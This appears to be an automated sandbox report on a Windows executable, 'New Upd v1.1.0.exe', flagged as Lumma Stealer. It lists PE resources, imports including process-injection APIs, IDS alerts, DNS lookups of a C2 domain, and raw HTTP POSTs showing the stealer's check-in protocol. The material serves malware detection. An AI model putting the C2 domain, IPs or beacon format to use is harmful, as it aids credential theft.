                                                                              .rsrc0x5b90000xa70000xa7000a3156311d6cd46f25829fa25a3e2e2dfFalse0.5336417009730539data7.048999692502979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_BITMAP0x5b942c0x4018cDevice independent bitmap graphic, 500 x 175 x 24, image size 262500, resolution 2800 x 2800 px/mEnglishUnited States0.04686904852593891
                                                                              RT_BITMAP0x5f95b80x1618Device independent bitmap graphic, 103 x 18 x 24, image size 5616, resolution 2835 x 2835 px/m, 16777216 important colorsEnglishUnited States0.20403111739745403
                                                                              RT_BITMAP0x5fabd00xb78Device independent bitmap graphic, 103 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colorsEnglishUnited States0.4434604904632153
                                                                              RT_BITMAP0x5fb7480x1df8Device independent bitmap graphic, 141 x 18 x 24, image size 7632, resolution 2835 x 2835 px/m, 16777216 important colorsEnglishUnited States0.18873826903023982
                                                                              RT_BITMAP0x5fd5400xe48Device independent bitmap graphic, 141 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colorsEnglishUnited States0.450492341356674
                                                                              RT_BITMAP0x5fe3880x1588Device independent bitmap graphic, 101 x 18 x 24, image size 5472, resolution 2835 x 2835 px/m, 16777216 important colorsEnglishUnited States0.215711175616836
                                                                              RT_BITMAP0x5ff9100xb78Device independent bitmap graphic, 101 x 18 x 8, image size 0, resolution 2835 x 2835 px/m, 256 important colorsEnglishUnited States0.47513623978201636
                                                                              RT_BITMAP0x6004880x9778Device independent bitmap graphic, 358 x 36 x 24, image size 38736, resolution 2800 x 2800 px/mEnglishUnited States0.008716731999174747
                                                                              RT_ICON0x609c000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.18497109826589594
                                                                              RT_ICON0x60a1680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.4390794223826715
                                                                              RT_GROUP_ICON0x60aa100x22data1.0588235294117647
                                                                              RT_VERSION0x60aa340x3bcdataEnglishUnited States0.45083682008368203
                                                                              RT_MANIFEST0x60adf00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                              DLLImport
                                                                              KERNEL32.dllCreateThread, GlobalUnlock, GlobalLock, GlobalAlloc, GetTickCount, WideCharToMultiByte, IsBadReadPtr, GlobalAddAtomA, GlobalAddAtomW, GetModuleHandleA, GlobalFree, GlobalGetAtomNameA, GlobalDeleteAtom, GlobalGetAtomNameW, FreeConsole, GetEnvironmentVariableA, VirtualProtect, VirtualAlloc, GetProcAddress, GetLastError, LoadLibraryA, SetLastError, SetThreadPriority, GetCurrentThread, CreateProcessA, GetCommandLineA, GetStartupInfoA, SetEnvironmentVariableA, ReleaseMutex, WaitForSingleObject, CreateMutexA, OpenMutexA, SetErrorMode, GetCurrentThreadId, FindClose, FindFirstFileA, FindFirstFileW, VirtualQueryEx, GetExitCodeProcess, ReadProcessMemory, VirtualProtectEx, UnmapViewOfFile, ContinueDebugEvent, SetThreadContext, GetThreadContext, WaitForDebugEvent, SuspendThread, DebugActiveProcess, ResumeThread, CreateProcessW, GetCommandLineW, GetStartupInfoW, MapViewOfFile, DuplicateHandle, GetCurrentProcess, CreateFileMappingA, WriteProcessMemory, SetEvent, CreateEventA, MultiByteToWideChar, CloseHandle, CreateFileA, GetSystemTimeAsFileTime, ExitProcess, LocalFree, CompareStringW, CompareStringA, FlushFileBuffers, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, SetStdHandle, FormatMessageA, GetConsoleMode, GetConsoleCP, SetFilePointer, GetLocaleInfoW, GetStringTypeW, GetStringTypeA, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, QueryPerformanceCounter, GetFileType, SetHandleCount, GetEnvironmentStringsW, Sleep, EnterCriticalSection, LeaveCriticalSection, GetVersionExA, InitializeCriticalSection, GetCurrentProcessId, GetModuleFileNameW, GetShortPathNameW, GetModuleFileNameA, GetShortPathNameA, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, DeleteCriticalSection, RtlUnwind, RaiseException, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapAlloc, GetProcessHeap, GetCPInfo, LCMapStringA, LCMapStringW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, HeapSize, WriteFile, GetStdHandle, GetACP, GetOEMCP, IsValidCodePage, HeapDestroy, HeapCreate, VirtualFree, HeapReAlloc, GetTimeZoneInformation
                                                                              USER32.dllLoadStringW, IsWindow, PostMessageA, GetDesktopWindow, MoveWindow, SetPropA, EnumThreadWindows, GetPropA, GetMessageA, EndPaint, KillTimer, GetAsyncKeyState, GetSystemMetrics, SetTimer, SetWindowTextA, GetDlgItem, CreateDialogIndirectParamA, ShowWindow, UpdateWindow, LoadStringA, BeginPaint, FindWindowA, WaitForInputIdle, DestroyWindow, MessageBoxA, InSendMessage, UnpackDDElParam, FreeDDElParam, DefWindowProcW, DefWindowProcA, LoadCursorA, RegisterClassW, CreateWindowExW, RegisterClassA, CreateWindowExA, GetWindowThreadProcessId, SendMessageW, SendMessageA, PeekMessageA, TranslateMessage, DispatchMessageA, EnumWindows, IsWindowUnicode, PackDDElParam, PostMessageW
                                                                              GDI32.dllSelectObject, BitBlt, DeleteObject, CreatePalette, CreateDCA, SelectPalette, RealizePalette, CreateDIBitmap, DeleteDC, CreateCompatibleDC
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-27T23:21:12.914580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.92.91443TCP
                                                                              2024-12-27T23:21:13.648235+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737104.21.92.91443TCP
                                                                              2024-12-27T23:21:13.648235+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.92.91443TCP
                                                                              2024-12-27T23:21:14.966012+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738104.21.92.91443TCP
                                                                              2024-12-27T23:21:15.745621+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738104.21.92.91443TCP
                                                                              2024-12-27T23:21:15.745621+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738104.21.92.91443TCP
                                                                              2024-12-27T23:21:17.354345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.92.91443TCP
                                                                              2024-12-27T23:21:19.657247+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.92.91443TCP
                                                                              2024-12-27T23:21:21.993137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.92.91443TCP
                                                                              2024-12-27T23:21:24.590051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.92.91443TCP
                                                                              2024-12-27T23:21:26.693770+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.92.91443TCP
                                                                              2024-12-27T23:21:27.993028+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449744104.21.92.91443TCP
                                                                              2024-12-27T23:21:29.343796+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.92.91443TCP
                                                                              2024-12-27T23:21:30.111486+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745104.21.92.91443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 23:21:11.622512102 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:11.622564077 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:11.622646093 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:11.690202951 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:11.690223932 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:12.914407969 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:12.914580107 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:12.917011976 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:12.917022943 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:12.917424917 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:12.959892988 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:12.961894035 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:12.961915016 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:12.961977959 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.648233891 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.648309946 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.648453951 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.649763107 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.649781942 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.649795055 CET49737443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.649800062 CET44349737104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.658092022 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.658124924 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:13.658201933 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.658454895 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:13.658467054 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:14.965913057 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:14.966012001 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:14.967083931 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:14.967094898 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:14.967320919 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:14.968369961 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:14.968384981 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:14.968425035 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745630980 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745673895 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745709896 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745738983 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745769978 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745806932 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745807886 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.745827913 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.745860100 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.754087925 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.754148006 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.754154921 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.767107010 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.767163992 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.767169952 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.819258928 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.865396023 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.912946939 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.912960052 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.955895901 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.955943108 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.955977917 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.955986977 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.956001043 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.956048965 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.956224918 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.956237078 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:15.956249952 CET49738443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:15.956254005 CET44349738104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:16.092202902 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:16.092266083 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:16.092339039 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:16.092637062 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:16.092654943 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:17.354258060 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:17.354345083 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:17.355745077 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:17.355757952 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:17.355982065 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:17.357028961 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:17.357249975 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:17.357285976 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:17.357372999 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:17.357381105 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:18.313754082 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:18.313826084 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:18.314080000 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:18.314748049 CET49739443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:18.314769030 CET44349739104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:18.398427010 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:18.398467064 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:18.398843050 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:18.398843050 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:18.398876905 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:19.657047987 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:19.657247066 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:19.658247948 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:19.658257008 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:19.658454895 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:19.659513950 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:19.659631014 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:19.659657001 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:20.447304964 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:20.447381973 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:20.447421074 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:20.450078964 CET49741443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:20.450093031 CET44349741104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:20.676800013 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:20.676856041 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:20.677076101 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:20.677263021 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:20.677275896 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:21.992973089 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:21.993136883 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:21.994311094 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:21.994323015 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:21.994647980 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:21.995707989 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:21.995874882 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:21.995910883 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:21.995969057 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:21.995978117 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:22.946105957 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:22.946196079 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:22.946362019 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:22.952692986 CET49742443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:22.952716112 CET44349742104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:23.330878019 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:23.330909967 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:23.330971956 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:23.331357956 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:23.331368923 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:24.589970112 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:24.590050936 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:24.591248035 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:24.591259003 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:24.591469049 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:24.595180035 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:24.595248938 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:24.595253944 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:25.358156919 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:25.358232975 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:25.358305931 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:25.358552933 CET49743443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:25.358573914 CET44349743104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:25.465745926 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:25.465790033 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:25.465847015 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:25.466142893 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:25.466156006 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:26.693584919 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:26.693769932 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:26.694911003 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:26.694924116 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:26.695142984 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:26.696258068 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:26.696332932 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:26.696338892 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:27.993030071 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:27.993114948 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:27.993164062 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:27.993277073 CET49744443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:27.993299961 CET44349744104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:28.038866997 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:28.038902998 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:28.039088011 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:28.039335012 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:28.039346933 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:29.343722105 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:29.343796015 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:29.344988108 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:29.345000029 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:29.345196009 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:29.346343994 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:29.346373081 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:29.346401930 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:30.111481905 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:30.111567974 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:30.111711025 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:30.111798048 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:30.111810923 CET44349745104.21.92.91192.168.2.4
                                                                              Dec 27, 2024 23:21:30.111821890 CET49745443192.168.2.4104.21.92.91
                                                                              Dec 27, 2024 23:21:30.111825943 CET44349745104.21.92.91192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 23:21:11.254877090 CET6420753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 23:21:11.569236040 CET53642071.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 23:21:11.254877090 CET192.168.2.41.1.1.10x61c5Standard query (0)begguinnerz.bizA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 23:20:55.301151037 CET1.1.1.1192.168.2.40x750bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 23:20:55.301151037 CET1.1.1.1192.168.2.40x750bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 23:21:11.569236040 CET1.1.1.1192.168.2.40x61c5No error (0)begguinnerz.biz104.21.92.91A (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 23:21:11.569236040 CET1.1.1.1192.168.2.40x61c5No error (0)begguinnerz.biz172.67.190.223A (IP address)IN (0x0001)false
                                                                              • begguinnerz.biz
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449737104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:12 UTC262OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-12-27 22:21:13 UTC1131INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aiova0f1t2baibi05mg6i06r7n; expires=Tue, 22 Apr 2025 16:07:52 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hh%2F8oySgx0%2BYSGjqZfzsU0A%2BYf4WCwvicxrqHBYXYIkE6WCSNB%2BmeREM%2BShTIm%2B3AIrgoqpO0wmnXQhbiUHwQhAaCQQ8T0NWXnnXannfcN9uT%2F4yHDQ4d9psqqqeL988tIA%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb3cd69e917e9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1519&rtt_var=585&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1845764&cwnd=232&unsent_bytes=0&cid=ac8902c75cff334e&ts=748&x=0"
                                                                              2024-12-27 22:21:13 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-12-27 22:21:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449738104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:14 UTC263OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 86
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:14 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                              2024-12-27 22:21:15 UTC1129INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=adk5741kermsfovakiase02u8f; expires=Tue, 22 Apr 2025 16:07:54 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
